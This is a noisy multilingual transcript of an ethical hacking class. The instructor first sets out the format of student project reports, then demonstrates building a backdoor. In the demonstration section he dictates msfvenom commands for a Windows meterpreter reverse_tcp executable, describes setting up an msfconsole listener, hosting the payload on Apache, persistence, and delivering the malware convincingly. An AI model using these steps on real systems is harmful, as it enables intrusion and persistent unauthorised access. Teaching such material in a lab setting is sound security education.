This conference will now be recorded. আচ্ছা ঠিক আছে, তো এবার দেখো ওই কি বলতে যাচ্ছিলাম যা ভুলে গেলাম, যা মাথা থেকে বেরিয়ে গেল, কোন টপিকে ছিলাম सर বলো তো। डॉक्यूमेंटेशन राइट, डॉक्यूमेंटेशन डॉक्यूमेंटेशन। तो ये जो सर डॉक्यूमेंटेशन का है ना হ্যাঁ ঠিক শুনতে পেলাম না। হ্যাঁ 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 ডকুমেন্টেশন, राइट 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 राइट। तो देखो আমি সব বলে দিচ্ছি, डॉक्यूमेंटेशन है उसका एक पार्ट और टेक्निकल प्रोग्रामिंग है दूसरा पार्ट है। तो डॉक्यूमेंटेशन के लिए पहला 3 पेज एक कॉमन फॉर्मेट होता है, वो कॉमन फॉर्मेट हम ग्रुप में शेयर कर देंगे। तो वो फॉर्मेट से ही आप लोगों को पहला 3 पेज जो है वो उस हिसाब से आप लोगों को बनाना पड़ेगा। बाकी का देखिए हर प्रोजेक्ट का एक रूल होता है, मतलब प्रोजेक्ट चाहे जो भी हो, पहले आपको उस प्रोजेक्ट के बारे में थोड़ा बहुत कुछ चीजें इंडेक्स का हिसाब से आपको लिखना पड़ता है। इंडेक्सिंग मतलब ये प्रोजेक्ट का मतलब इंडेक्सिंग आप लोग समझते हैं, मतलब इस বাংলায় যেটাকে আমরা সূচিপত্র বলি তাই তো, ইংলিশে যেটাকে আমরা ইন্ডেক্সিং বলি। তো the thing is that in indexing you need to write few points upon which you are going to build up the remaining part of the project. I mean you are going to discuss about these points, so those points will come in form of bullets. So bullets must be there as far as I mean points, and the name of the point should be clearly clearly stated that this is the point on which you will be discussing in this particular page number. So page number should be added on that after that particular point number. So after that उसके बाद आप लोगों को क्या करना पड़ेगा कि पहले ये जो इंडेक्सिंग पार्ट के बाद नेक्स्ट जो पॉइंट आएगा वहां पे आप लोगों को पहले जो आप काम करना चाहते हो वो काम एक्चुअली है क्या, ठीक है, उससे क्या उसका क्या एडवर्स साइड है वो पहले थोड़ा सा जानकारी आप लोगों को लिखना पड़ेगा, ठीक है। मतलब दिस इज अ काइंड ऑफ अटैक व्हिच हैपेंस रेगुलरली, आई मीन नाउ एंड देन, एंड दिस कैन डू लॉट ऑफ डैमेजेस, और पहले उस अटैक के बारे में थोड़ा बहुत लिखिए, ठीक है। और उससे क्या कुछ हो सकता है, उसका कोई पास्ट रिकॉर्ड है तो वो भी इंटरनेट से डाउनलोड कीजिए, मतलब इस टाइप का अटैक से क्या कुछ हुआ है पहले उसका भी थोड़ा सा इंफॉर्मेशन इंटरनेट से गूगल से हर इस टाइप का डॉक्यूमेंटेशन टाइप का इंफॉर्मेशन निकालिए और उसको पहले डालिए। उसके बाद आप लिखने वाले हो कि इस टाइप से हम लोग को प्रैक्टिकली प्रोजेक्ट जो है वो आपका मतलब ये हैकर्स लोग जो है वो इस हिसाब से इसको यूटिलाइज करते हैं और इस हिसाब से अटैक होता है। तो एज पर एज द टूल्स आर कंसर्न, पहले टूल के ऊपर थोड़ा सा जोर दीजिए। तो एज पर एज टूल्स आर कंसर्न राइट फ्यू नेम, आई मीन फ्यू टूल नेम्स, ठीक है, पहले कुछ कुछ टूल्स का नाम वहां पे लिखिए, ठीक है। और एक दो टूल्स का अगर आपको लगता है कि एग्जीक्यूशन का स्नैपिंग मतलब स्नैपशॉट आप उठा पाते हो तो उसका एग्जीक्यूशन का एक दो स्नैपशॉट उठा के आपका उसमें लगा दीजिए, ठीक है। मतलब डॉक्यूमेंटेशन में आप लाइए वो वाला सारा इमेज जो टूल्स का एग्जीक्यूशन का है, ठीक है। मानिए कि मैन इन द मिडिल अटैक, तो मैन इन द मिडिल अटैक इज आल्सो पॉसिबल विद एआरपी स्पूफिंग, राइट, एंड आल्सो पॉसिबल विद ईथर कैप -G। तो कोई सा भी टूल आप यूज करते हो तो उसका एक एग्जीक्यूशन का स्नैपशॉट उठा के एक दो स्नैपशॉट उठा के आप यहाँ पे बिठा दीजिए। फिर पहले ही आप उसका नाम दे दिए हो, फिर आप नीचे लिखने वाले हैं बट हैकर्स आर लाइक दे आर प्रोग्राम फ्रीक, so they would love to write their own programs, ठीक है। तो Python is a common language which belongs to the hacker's choice, right? So by using Python this type of projects can be, I mean this kind of program can be written so that while execution of the program, I mean it can do so and so, ठीक है, समझ में आ रहा है सबको। तो फिर उसके बाद आपको क्या कुछ करना पड़ेगा, उसके बाद आपको प्रोग्राम जो है वो पहले उसका पूरा जो आप जो लिखे हो डेस्कटॉप में उसका पूरा इमेज वहां पे आपको डालना है, या फिर आपको मतलब स्नैपशॉट डालिए या फिर पूरा प्रोग्राम लिख के आप वहां पे लिखिए, ठीक है, जो भी आपको अच्छा लगेगा। सॉफ्ट कॉपी है तो आप लिख भी सकते हो, लेकिन मेरा ख्याल से क्या है कि प्रोग्राम पूरा मशीन में अगर हो तो उसका एक स्नैपशॉट उठा के वहां पे आप डालना ही सही होगा, क्योंकि प्रोग्राम लाइन बाय लाइन लिखना ये कैसे टाइप का होगा, उसका फॉर्मेट कुछ अच्छा नहीं दिखता है, ठीक है। बट if a program is there, you have written the program at your system and you have taken the snapshot as image and you have added that image at your project documentation file, that would look much more better as far as I mean my choice। नाउ ये आप लोग का चॉइस है। अभी जैसे ये आप करते हो उसके बाद इसका एग्जीक्यूशन प्रोग्राम लिखने के बाद प्रोग्राम को आप लोगों को समझाना पड़ेगा कि प्रोग्राम में ये दो तीन लाइन आपको ऐड करना पड़ेगा कि ये चीज है, आई हैव टेकन द हेल्प ऑफ दीज लाइब्रेरीज ऑफ पाइथन लैंग्वेज, क्योंकि हम लोग करते हैं ना कि इंपोर्ट scapy.all as scapy, फिर हम लोग कभी कभार करते हैं इंपोर्ट टाइम मॉड्यूल, इंपोर्ट sys मॉड्यूल,
तो ये सारा आपको पहले लिखना पड़ेगा। फिर थोड़ा बहुत प्रोग्राम का एक्सप्लेनेशन अगर आप दे पाए तो फिर अच्छा है, नहीं दे पाए तो भी ठीक है, लेकिन प्रोग्राम का एग्जीक्यूशन का स्नैपशॉट आपको उठाना पड़ेगा, और एग्जीक्यूशन के चलते क्या हो रहा है विक्टिम में और क्या हो रहा है टारगेट में, इसका भी स्नैपशॉट उठा के आपको अपना इमेज में डालना पड़ेगा। ठीक है, डालने के बाद आपको एक समरी लिखना पड़ेगा कि देयर आर this kind of attack. So if we would I mean like to I mean we all require to um, uh, um, uh, need to have some awareness I mean on these kind of attacks, and if we want to save our network and if we want to save our system from this kind of attack, these are the preventive measures. तो प्रिवेंटिव मेजर्स आपको आराम से गूगल से मिल जाएगा। आप लोग गूगल में ढूंढिए कि व्हाट आर द प्रिवेंटिव मेजर्स फॉर अगेंस्ट डीएनएस स्पूफिंग, व्हाट आर द प्रिवेंटिव मेजर्स अगेंस्ट वाईफाई जैमिंग, तो आप लोग को आराम से मिल जाएगा। तो डॉक्यूमेंटेशन लेके कुछ खास चिंता का बात नहीं है। चिंता यह है कि आपको एक सीक्वेंस फॉलो करना पड़ता है। वो सीक्वेंस पहला 3 पेज हम आपको इन समरी फर्स्ट 3 पेजेस विल बी कॉमन फॉर ऑल। ठीक है, तो वो 3 पेज आपको उसी हिसाब से रखना पड़ेगा, वो 3 पेज हम शेयर कर देंगे। दूसरा चीज ये है कि उसके बाद आपको एक इंडेक्सिंग करना पड़ेगा, और इंडेक्सिंग के बाद पहले क्या ये अटैक है और इससे क्या हानि है, इसके बारे में आप लोगों को थोड़ा सा लिखना पड़ेगा। वो लिखना ऑलवेज गूगल से सर्च करके लिखिए। ठीक है, उसके बाद आप कुछ टूल्स का नाम जैसे कैसे करके हैकर्स यूजेस दीज टूल्स, दीज आर कॉमन टूल्स फॉर दिस काइंड ऑफ अटैक, और उसमें से एक दो टूल आप ले लीजिए जिसका एग्जीक्यूशन आप करवाइए, और एग्जीक्यूशन के चलते उसका स्नैपशॉट उठा के वहां पे डालिए। ठीक है, और क्या कुछ हो रहा है वो दिखाइए। ठीक है, अपना डॉक्यूमेंटेशन में फिर आप लिखिए जैसे जैसे करके बताएं। फिर आप प्रोग्राम में आइए, प्रोग्राम लिखिए, प्रोग्राम का स्नैपशॉट उठाइए, वहां पे लिखिए। अगर हो सके तो कुछ एक्स्ट्रा इन्फॉर्मेशन प्रोग्राम को समझाने के लिए आप वहां पे डॉक्यूमेंटेशन में डालिए। फिर आपको ऐसे ऐसे करके आपका फाइनल जो है प्रिवेंटिव मेजर से आपको कंक्लूड करना है, मतलब इस टाइप के अटैक को कैसे करके हम लोग प्रिवेंटिव मतलब प्रिवेंशन करेंगे। क्योंकि देखिए ये कोर्स आपका एथिकल हैकिंग का है, और उससे काफी हद तक मिलता जुलता हुआ एक टर्मिनोलॉजी है, वो है साइबर सिक्योरिटी। तो आप लोग को ऑलवेज ध्यान देना पड़ेगा कि सिक्योरिटी का कुछ एलिमेंट आपको प्रोजेक्ट रिपोर्ट में लिखना ही पड़ेगा, नहीं तो फिर दैट रिपोर्ट इज गोइंग टू बी कंसिडर्ड एज हैकर्स रिपोर्ट, you none of you are hackers. So all of you are doing a course on ethical hacking, hacking for for good purpose. So that is why you need to add some preventive measures information at your project report at the end, so that it feels good, it looks good till the end. ठीक है, तो ये सीक्वेंस आप लोग को फॉलो करना पड़ेगा। अच्छा, यश का एक क्वेश्चन है कि सर प्रोजेक्ट तो वाईफाई जैमिंग था, क्रैकिंग। yes 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 I forgot ईशान has mentioned, probably I forgot कि आपका वाईफाई जैमिंग तक ही था, क्रैकिंग नहीं है। वेरी गुड, ठीक है, वाईफाई जैमिंग तक ठीक है। देखिए मतलब आई डू नॉट वांट टू डिस्करेज एनी ऑफ यू, ठीक है, क्योंकि हम प्रोजेक्ट का नाम दिए हैं तो हम चाहते हैं कि उसमें से कोई सा भी प्रोजेक्ट जो अपना अपना एफिशिएंसी का हिसाब से जिससे जितना तक बन पाए वो उतना तक ही कीजिए। बट मे आई ऑलवेज यूज टू एनकरेज द स्टूडेंट टू proceed with the project by their own, because of the reason ki I have already shared few documentations. So now at least I can expect from you all that since you have the coding part, you have the knowledge, so at least you will try to execute, you will try to face some problem, you will try to find the debug solutions and all this stuff. So you need to work with those codes, you need to work with those tools, तभी ना जाके बनेगा बात। ठीक है, हाँ वाईफाई जैमिंग तक तो सही है, ठीक है, नो इशू। बट यश वन थिंग, वाईफाई जैमिंग के बाद भी डॉक्यूमेंटेशन में आपको ये लिखना पड़ेगा कि आपका वाईफाई जैमिंग के बाद कैसे आप इसको प्रोहिबिट कर सकते हो। ठीक है, मतलब व्हाट आर द अवेयरनेस पॉइंट्स दैट यू जस्ट शुड कंसीडर before once he or she has got disconnected from the existing Wi-Fi connectivity, and all of a sudden after a few seconds interval, all of a sudden the connection arrives once again, and we usually click on that particular connection, seems to be a legitimate connection because it is arriving with the same name of my original connection, and we are we are being forced to connect to that particular stuff. So automatically a security ID. Now in that case only user must be very cautious that why is it asking me again the security parameters, because I was connected, so automatically it should get connected. Why is it again asking me for the security credential, which it should not, right? So this kind of awareness, whenever you will find it in Google, you will get all this kind of documentation. But my suggestion to all of you that please do add at the end of your documentation part, please add some technique, some cautions, some some precautions,
some points to be considered to avoid this kind of attacks, some firewall issues, if it is possible to implement certain firewalls, all this stuff to conclude your project part. That looks good, that will carry the points, you know. ओके और बताइए और क्या लेके डिस्कशन करना है। एक तो प्रोजेक्ट ग्रुप के बारे में डिस्कस कर चुके हैं, तो प्रोजेक्ट ग्रुप जो है वो आप लोग अभी ऑलमोस्ट क्लियर हो चुका है, लेकिन फिर भी आप लोग एक फॉर्मली ग्रुप में डालने वाले हो कि किसका प्रोजेक्ट ग्रुप में कितने जन का है, और उन लोगों का प्रोजेक्ट आप लोग सोच के बताएंगे कि कौन सा प्रोजेक्ट आप लोग लेके काम करने वाले हो। तो ये तो पहला चीज ये है, आप लोग ग्रुप में पोस्ट करने वाले हो। और दूसरा चीज ये है कि मुझे नहीं लगता है कि और किसी का, आज तो बहुत जन क्लास अटेंड कर रहे हैं, तो मुझे नहीं लगता है कि किसी का और कुछ प्रॉब्लम ग्रुप लेके होना चाहिए। अगर है तो फिर खुल के बताइए, फिर वी कैन कंक्लूड द डिस्कशन अबाउट दिस पर्टिकुलर टॉपिक। हेलो सर। বলো সৈকত। হ্যাঁ স্যার, বলছি আমি আর নিরুপম একটা গ্রুপে থাকবো। খুব ভালো, খুব ভালো। তুমি কারণ নিরুপম? আমরা তো সবাইকে চিনি না, আমি আর নিরুপম চিনি, তাই নিরুপম আর আমি হ্যাঁ, একটা তোমরা গ্রুপে তো থাকবো। আর তোমরা তো একটা কলেজে, ঠিক আছে ঠিক আছে, কি প্রজেক্ট করবে সেটা ভেবে নিয়ে আমাকে জানিয়ে দিও সৈকত। আমরা ওয়াইফাই জেনারেটর করবো। আচ্ছা, সবাই ওয়াইফাই জেনারেটর করবে, আচ্ছা করো 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 করো। আচ্ছা, আর আর তাহলে 4টে গ্রুপ হলো, তাহলে দুটো গ্রুপ বলছে ওয়াইফাই জ্যামার, আর দুটো গ্রুপ ঠিক আছে, মোটামুটি বোঝা গেল। একটা হচ্ছে র্যানসামওয়্যার, দেবকান্তদের র্যানসামওয়্যার, আর এদিকে হচ্ছে তোমার ডিএনএস স্পুফিং। ঠিক আছে, রণজিৎ দেব বোধহয় ডিএনএস স্পুফিং। যাই হোক, তো আর কোনো কারো প্রজেক্ট গ্রুপ নিয়ে কোনো সমস্যা নেই তো? কেউ পরে বলবে না তো স্যার আমি কিন্তু একা পড়ে গেছি, আমার সঙ্গে কেউ নেই? আছে কি এরকম কেউ? সায়ন কার সাথে আছো? ও সায়ন, সায়ন ঠিক আছে, তার মানে আর কারো কোনো সমস্যা নেই। ঠিক আছে, ওকে ফাইন। আচ্ছা, তাহলে একটা তো গেল প্রজেক্ট নিয়ে ডিসকাশন। আচ্ছা, 2 নম্বর একটা ডিসকাশন হচ্ছে, দেখো। হ্যাঁ বলো। হ্যাঁ স্যার, বলছি এই ভিমওয়্যার প্যারট এটা কি লাগবে? হ্যাঁ, মানে প্যারট না হলেও তোমার কালি লাগবে। আচ্ছা, বলছি আমার মানে কম্পিউটার ল্যাপটপে রান করছে না। কি রান করছে না গো? এই সফটওয়্যারটা। মানে লিনাক্স রান করছে না? না স্যার। ওটা তোমাকে তো আমি ভাস্কর স্যারের নাম্বার দিইনি। না স্যার, আমাকে দেননি এটা। তো কাকে কাকে দিলাম মনে নেই। আচ্ছা, আমি গ্রুপে পোস্ট করে দিচ্ছি ভাস্কর স্যার, যাদের যাদের টেকনিক্যাল যেখানে ইনস্টলেশন নিয়ে আটকে যাচ্ছে না, তারা একবার স্যারকে ফোন করে নিও, কারণ স্যার অনেক বেশি এইসব ব্যাপারে, স্যার তো হার্ডওয়্যারের লোক, স্যার এফিশিয়েন্ট, এবং স্যার বলতে পারবে যে তোমার কোথায় সমস্যার জন্য ইনস্টলেশনটা আটকে গেছে। ঠিক আছে, আমি ভাস্কর ঠিক স্যারের আছে নাম্বারটা স্যার। তোমাকে দিয়ে দিচ্ছি, তুমি একবার আজকেই কল করে নিও, কথা বলে নিও। ঠিক আছে। ঠিক আছে, তাহলে হোপফুলি প্রজেক্টের গ্রুপ নিয়ে কারোর আর কোনো সমস্যা নেই, তাহলে আমরা আগে যাচ্ছি। আহ Okay, one more thing to discuss with all of you. Probably some of you have asked me yesterday night only. রণজিৎ প্রবাবলি, আমি ঠিক রিকল করতে পারছি না নামটা, আমি খুব তাড়াতাড়ি ভুলে যাই। তো যাই হোক, তো কেউ আমাকে একটা জিজ্ঞেস করেছিল যে ওই এর ব্যাপারে, আমাদের কি বলে কিসের ব্যাপারে, এটা হচ্ছে ইএইচএ সার্টিফিকেশনের ব্যাপারে। ঠিক আছে, তো আই জাস্ট হ্যাভ কনফার্ম ইএইচএ সার্টিফিকেশন। ঠিক আছে, এটা হচ্ছে ইসি কাউন্সিলের সার্টিফিকেশন, উইচ উড কস্ট ইউ 3000 রুপিস। ঠিক আছে, এটা হচ্ছে এক্সাক্ট প্রাইস। আই ক্যান্ট রিমেম্বার হু হ্যাজ অ্যাকচুয়ালি আস্কড মি। তোমাদের মধ্যে কেউ একটা কালকে রাত্রে আমার জিজ্ঞেস করেছিল যে ইএইচএ সার্টিফিকেশনের কোর্স কস্টিংটা কত। ইএইচএ সার্টিফিকেশনের কস্টিং হচ্ছে 3000 টাকা। রণজিৎ, হ্যাঁ রণজিৎ, তো 3000 টাকা হচ্ছে কস্টিং। তো এটা আমি কালকে রাত্রিই আমাদের অফিসে কথা বলেছি। তো তোমরা যদি কেউ ইন্টারেস্টেড হও ইএইচএ সার্টিফিকেশনের জন্য, তাহলে তোমরা আমাকে জানাবে, আমি তোমাদেরকে একটা লিংক ফরওয়ার্ড করে দেবো, সেই লিংক থেকে রেজিস্ট্রেশন করতে হবে। এটা একটা ইসি কাউন্সিলের সার্টিফিকেশন,
এবং এটা কিন্তু পুরোটাই অনলাইন টেস্ট, ঠিক আছে। মাল্টিপল চয়েস টাইপ কোয়েশ্চেন আসবে, কেস স্টাডি টাইপ কোয়েশ্চেন আসবে। পরীক্ষার আগে তোমাদেরকে কিছু ডাম্পস প্রোভাইড করা হয়, সেই ডাম্পস গুলো তোমাদেরকে পড়তে হবে, পড়ে তোমাদের এক্সামে অ্যাপিয়ার হতে হবে, ঠিক আছে। আর আই মিন দ্য লাস্ট পয়েন্ট প্রবাবলি রণজিৎ আমায় জিজ্ঞেস করেছিল যে যদি এটা ছাড়া আর যদি আমরা যদি কেউ সেকেন্ড কোনো ইন্টার্নশিপ করতে চাই সেকেন্ড কোনো প্রোগ্রামের ওপর, দ্যাট উড কস্ট ইউ 1500 রুপিস। সেটা আমি কথা বলে এটা আজকের জন্য এক্সটেন্ড করেছি। তোমরা বলছিলে কেউ তোমরা অ্যান্ড্রয়েড বা এরকম কিছু করতে চাও, সেটা করলে তোমাদের 1500 রুপিস উড বি ইয়োর সেকেন্ড ইন্টার্নশিপ প্রোগ্রাম ফিস। এখন কোনটা তোমাদের জন্য বেটার হবে সেটা তোমরা নিজেরা ভাবো, ভেবে তোমরা ইউ বেটার ডিসাইড, ঠিক আছে। চলো আচ্ছা হুম, তো আমরা প্রথমে শুরু করব হচ্ছে কি দিয়ে, আমরা প্রথমে শুরু করব হচ্ছে দেবকান্তর একটা রিকোয়েস্ট আছে যেটা অনেকদিন ধরে আমরা পেন্ডিং, সেই পেন্ডিং রিকোয়েস্টটা দিয়ে আমরা শুরু করব যে ব্যাকডোর, তাই তো। ব্যাকডোর জিনিসটা কি, ব্যাকডোরের কি সমস্যা দেবকান্ত এটা ফেস করছে, সেই সমস্যাটা দেখা যাক আগে আমরা কিভাবে রিজলভ করতে পারি। আচ্ছা, সো গাইজ আই রিকোয়ার ইওর হেল্প অনলি, ঠিক আছে। আই ইউজ টু ফরগেট, সো আই মিন I might have forgot the inter processes, so please let me know. I mean, I should ask, I mean, Rishi Kalpo, tell me that what I supposed to do if I supposed to show someone about the, execution of backdoor, and what about backdoor? So what I am supposed to do first? Rishi, বলো, চ্যাট বক্সে লিখতেও পারো, বলতেও পারো। প্রথমে কিভাবে আমি শুরু করব, ব্যাকডোর জিনিসটা কি সেটা একটু এক্সপ্লেন করি, মানে এক্সপ্লেন করো। अच्छा, बैक यश, बैकडोर का मतलब पोर्ट फॉरवर्डिंग है। आपको क्या हो गया है अचानक से? पोर्ट फॉर फाइल ट्रांसफर। यश, क्या हुआ है आपको? ऋषि कॉल को HTTP पोर्ट फॉर फाइल ट्रांसफर बैकडोर का मतलब, ओ माय गॉड, हु कैन टेल मी? ईशान बोलो, बैकडोर की गो? রণজিৎ, প্রাণেন্দু বলো, কে কে পারবে? यश, bypassing to some extent. নিরুপম, সার্ভার হাইজ্যাক। আরে বাবা, ব্যাকডোর, बैक डी डबल ओ आर, बैकडोर। तो यही কথাটাকে তো আমরা, ये वर्ड को अगर हम लोग दो हिस्से में डिवाइड किए, बैक और डी डबल ओ आर, बैकडोर, तो इससे ही ना आपको पता लगता है मेथड बाय विच ऑथराइज्ड एंड अनऑथराइज्ड यूजर्स गेट एक्सेस। डेफिनेटली मतलब one port is there with which I am already into a system, right? And yes, definitely now I am going to open up another port with which I mean in the latter phases I can once again go inside to the system. Now considering the fact if the front end will get blocked with the firewall or some of the user activities, then also I would have gone inside to that particular system, because by that time I have opened up, I have opened up many of the ports. So these ports are not known to the users or not known to the victim, right? So that is why this kind of activities are known as backdooring, right? So we are there inside the system now without the বলো বলো কে কি বলছিলে বলো। স্যার সার্ভার হাইজ্যাক করার জন্য ব্যবহার হয়। হ্যাঁ, ডেফিনেটলি সার্ভার হাইজ্যাক করাটাই মেন উদ্দেশ্য, কিন্তু অলরেডি তোমার সিস্টেমটা হ্যাক হয়ে গেছে। হ্যাঁ, এটা তোমাকে ভাবতে হবে। ব্যাকডোর কথাটা মানেই হচ্ছে পেছনের দরজা, তাই তো গো। তো এই পেছনের দরজাটা কখনো সামনের দরজা হতে পারে না। লোকজন কি পেছনের দরজা দিয়ে কোনোদিন ঢোকে? ঢোকে না। লোকজন সবসময় সামনের দরজা দিয়ে ঢোকে। সো দ্যাট ইজ ওয়াই ব্যাকডোর মিনস you are already there inside that system, now you want to open up another door, ঠিক আছে। যেরকম তুমি একবার ভেবে দেখো, সিঁদেল চোর শুনেছো তো বাংলায়, সিঁদেল চোর। কেন এদেরকে সিঁদেল চোর বলা হতো? শীত কেটে ভেতরে ঢুকতো, মাটির বাড়িতে শীত কেটে ভেতরে ঢুকতো। এই যে শীত কেটে ভেতরে ঢোকা, এই এটাকে বলে, মানে এই প্রসেসটাকে বলা হয় ব্যাকডোরিং, ঠিক আছে। তো নেক্সট টাইম অনওয়ার্ডস আমি যখন তোমার বাড়িতে ঢুকবো,
আমি front door use করব না, I will not be using the front door, so I will be, I will be, inside your system with some other door, and that door is known as back door, right? যাই হোক, তো আমরা এখানে when a malware execute in a machine and it will open another port, definitely that is actually the case. But to demonstrate backdoor, definitely we need to take the help of what? Take the help of your Metasploit software, which is MSF console and MSF Venom. So MSF Venom is the command for building up the malware. So what should be the command? We know that MSF Venom, then -p space Windows, then METER Meterpreter, then REVER AC reverse underscore TCP, right? Sorry, হ্যালো হ্যাঁ বলো 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 বলো, আমি শুনছি। স্যার, এটা যদি এটা উইন্ডোজে করে স্যার, যদি অ্যান্ড্রয়েড দিয়ে করা হয়? হ্যাঁ, অ্যান্ড্রয়েডে তো আমরা আসবো গো, একটু সময় দাও না, তখন বলবো। অ্যান্ড্রয়েডে আমি বলেছিলাম তোমাদের পেলোডটা শুধু বদলে যাবে। হ্যাঁ, এখানে উইন্ডোজ মেটাপ্রেটার রিভার্স আন্ডারস্কোর টিসিপি, ওখানে হচ্ছে অ্যান্ড্রয়েড মেটাপ্রেটার রিভার্স আন্ডারস্কোর টিসিপি। হ্যাঁ ওকে স্যার। মানে হ্যাঁ হ্যাঁ বলো বলো হ্যাঁ বলো। স্যার, বলছি যে তাহলে কি মানে হ্যাক করার জন্য এটাও কি একটা হ্যাক করার প্রসেস? মানে হ্যাঁ স্যার, বলছি এটাও তাহলে একটা হ্যাক করার প্রসেস, যেখানে আমরা মানে ফ্রন্ট দিয়ে ঢুকছি না, মানে অন্য একটা কোনো রাস্তা দিয়ে সিস্টেমকে হ্যাক করার জন্য ঢুকছি। হ্যাঁ, অ্যাকচুয়ালি তো আমরা সিস্টেমটার মধ্যে ঢুকে বসে আছি, ঠিক আছে? ঢুকে বসে যখন আছি তখনই আমরা কাজটা করে দেবো যে পেছন থেকে টুক করে আরেকটা পোর্টকে আমরা ওপেন করে দেবো, যার ফলে কি হবে যে ভবিষ্যতে কোনোদিন যদি সামনের দরজাটা বা পোর্টটা ব্লক হয়ে যায়, তাহলে আমরা কিন্তু পেছনের দরজাটা দিয়ে ঢুকতে পারবো, ঠিক আছে? সুতরাং এটাকে আমরা একদম ফ্রন্ট এন্ড অ্যাক্টিভিটি হ্যাক করার বলতে পারি না, কারণ অলরেডি সিস্টেমটা হ্যাক হলে তবেই আমরা পেছনের দরজাটা খুলতে পারি। বুঝতে পারছো কি বলতে চাইছি? তোমাকে পেছনের মানে দরজাটা খুলতে গেলে তো বাড়ির ভেতরে আগে ঢুকতে হবে গো। হ্যাঁ স্যার, মানে আমি অলরেডি সিস্টেমের মধ্যেই আছি, সিস্টেমকে অলরেডি হ্যাক করে নিয়েছি। এবারে যদি ফ্রন্ট হ্যাঁ, গেটটা বন্ধ থাকে তখন আমি ব্যাক ডোর দিয়ে কাজ করতে পারবো, মানে সিস্টেমের এক্স্যাক্টলি ডিটেলস অন্য এক্স্যাক্টলি জায়গায় নিয়ে যেতে এক্স্যাক্টলি পারবো। এক্স্যাক্টলি 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 ঠিক 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 তাই, হ্যাঁ স্যার, বুঝতে পেরেছি। ঠিক তাই। বলো, এটা বুঝতে কারো অসুবিধা হচ্ছে? No problem. That is a very common command. MSF Venom space -p space Windows Meterpreter reverse underscore TCP lhost is equal to 192.168.1.104 -f space exe greater than /root/homo 77.exe. Now by that time what I can do, by that time I can actually come up out here and I could type, because that is also going to take some time. So MSF console, MSF console is the command to set up for the listener. So guys, probably you can recall this entire system hacking phase was actually divided into two sub phases. Phase number one, whenever you are asked to build up the malware or malicious file. Phase number two, when you are actually asked to set up the listener. So in phase one you are building the malware and you will be delivering the malware in some other in some beautiful based on your merit, you are going to deliver it in a convincing way. Now once you have delivered it successfully and hacker has executed that particular malicious file, then you need to come up with a listener so that it can sense that particular activity, and once it is being executed by the remote system, so automatically you will be inside that particular system, right? So that is what you need to do. First phase, you need to build up the malicious file by by executing this kind of command, and in the phase number two you need to set up the listener. So that is what we need to do, and once we are there inside that particular system, then we need to set up the back door. But ভালো করে একটা কথা আবারও তোমাদেরকে বলছি, মানে এই কথাগুলো তো রোজ দিন বলা সম্ভব নয়, তোমাদের সবাইকেই বলছি যে ইউ বেটার ফোকাস অন দা কোডিং পার্ট, ঠিক আছে? কোডিং আমরা প্রচুর কিছু কিন্তু ফরওয়ার্ড করেছি, স্পেশালি মানে আমি বারবারই বলবো তোমাদের মধ্যে অনেকেই খুব সিরিয়াস আছে এবং মেজরিটি স্টুডেন্টস আর ভেরি সিরিয়াস in this particular domain, ethical hacking, which I like most, which I have shared my own opinion about you all to Rajesh sir, especially that I love this batch because all of you are very serious about this ethical hacking field, that I love the most. So I mean, you should
you should come up with the coding part. I mean, you should not depend upon with the tools and their activities, right? So তার জন্যই তোমাদেরকে এত কোডিং ফরওয়ার্ড করা, এত কোডিং দেখানো, এবং সেগুলো কিন্তু টাইম টু টাইম তোমাদের নিয়ে কাজ করতে হবে। এই যে ব্যাকডোরের কথা যখন বলছি, আই হ্যাভ অলরেডি এক্সপ্লেইন দ্যাট ব্যাকডোর প্রোগ্রাম ইজ অলরেডি শেয়ার্ড, ম্যালওয়্যার ব্যাকডোর, ঠিক আছে? সেখানেও দেখবে তোমরা কেউই সেই প্রোগ্রামগুলো দেখোনি, সেটা আমি বুঝতে পারছি, কেননা yes, have you seen the backdoor program which I have shared? Come up in the chat box and please type, have you seen the programs, all the programs which I have shared? No, not at all, sir. Yes, that I can understand from all of your point of view. None of you have probably gone through all the programs which I have shared. Why I am asking you? Because see, if I am talking about these two phases, you should come up, you should counter me. Sir, you're talking about that whenever this backdoor kind of stuff usually takes place, so definitely there's supposed to be two phases. So the programs which you have shared, are they only a single program or two different programs are there? I have shared you two different programs. One is for setting up the listener and one is for setting up the backdoor. ताले भालो करे बोझो, हम लोग दो दो प्रोग्राम शेयर किए हैं बैकडोर लेके। तो एक में आप लोग को लिसनर वाला प्रोग्राम मिलने वाला है और दूसरे में आप लोगों को एक मेलवेयर मिलने वाला है, जो एग्जीक्यूशन के दौरान आप जो लिसनर सेट किए उसके चलते आप अंदर जो है वहां पे जाने वाले हो। বাবা এ তো প্রচুর টাইম নিচ্ছে গো, ভোর করে দিচ্ছে। বলো তো কার কতটা কি মনে আছে ব্যাকডোর রিগার্ডিং, কার কতটা কি মনে আছে একটু শুনি 5 मिनट माने कंसिडरिंग द फैक्ट दैट हम लोग अंदर चले गए हैं सिस्टम का, तो अभी आगे जाके क्या करना पड़ेगा? I don't know, this parrot is taking some more time. I mean, साहिल SSH एकटू रिकॉल करो, थोड़ा सा रिकॉल कीजिए कि हम लोग को क्या करना पड़ता है whenever we are into a system. Open a new port. Yes, definitely open a new port. And how is it possible? Use the exploit. Ishan, are you sure using the exploit? Okay. Metapreter session. Yash has said. Ronojit, persistent connection. Very good, Ronojit. Very good. This is one solution that is very good. I like this answer. That is one way is, come up with a persistent connection. And Ishan was also right. Ishan was also right. Use the exploit. That was also correct answer. Right? Metapreter session. Yes, definitely metapreter session. So both of you, all of you are right. Prananendu, all of you are right. ঠিক আছে? So there are two options. One is for setting up the setting up persistent connection with a command of persistence, and the second way is like Ishan has mentioned, that using an exploit by doing this kind of stuff. I don't know, I might be facing some problem in this parrot, so that it is taking so much time while building up a simple malware. Anyhow, so let us come out here. I don't know what is happening. MSF Venom space -p space Windows slash METER metapreter REVERS reverse underscore TCP space LHOSTL is equal to new tab IF config config 1.105 Windows is equal to 192.168.1.105. then import तो उतना -f space exe space /root/ sumo 666.exe. Here again I'm facing some problem related to Ruby. Oh my god.
Yes, at last I am able to go inside. I don't know why it has taken so much time. I mean, anyhow, so this is the case. And you know, guys, I mean, what I need to do is ls minus l, and then, you know, like showmo 77, right? Showmo 77.exe. So this was the file. So what I need to do, I need to add this thing. I mean, sorry, this thing showmo 77.exe, right? So it has now come up out here. Now what I need to do, I need to copy this file showmo77.exe and where, then www, then html, and you know, like private, right? So let me copy this file and then start service ATAC start. Okay, so Apache 2 service started status must be active. So once I'm there, then you know, like come out here, like VM, then log into this VM, control before executing this file, what I need to do, I actually need to come out here. I mean, come out here in this terminal and say so it has taken this port number of 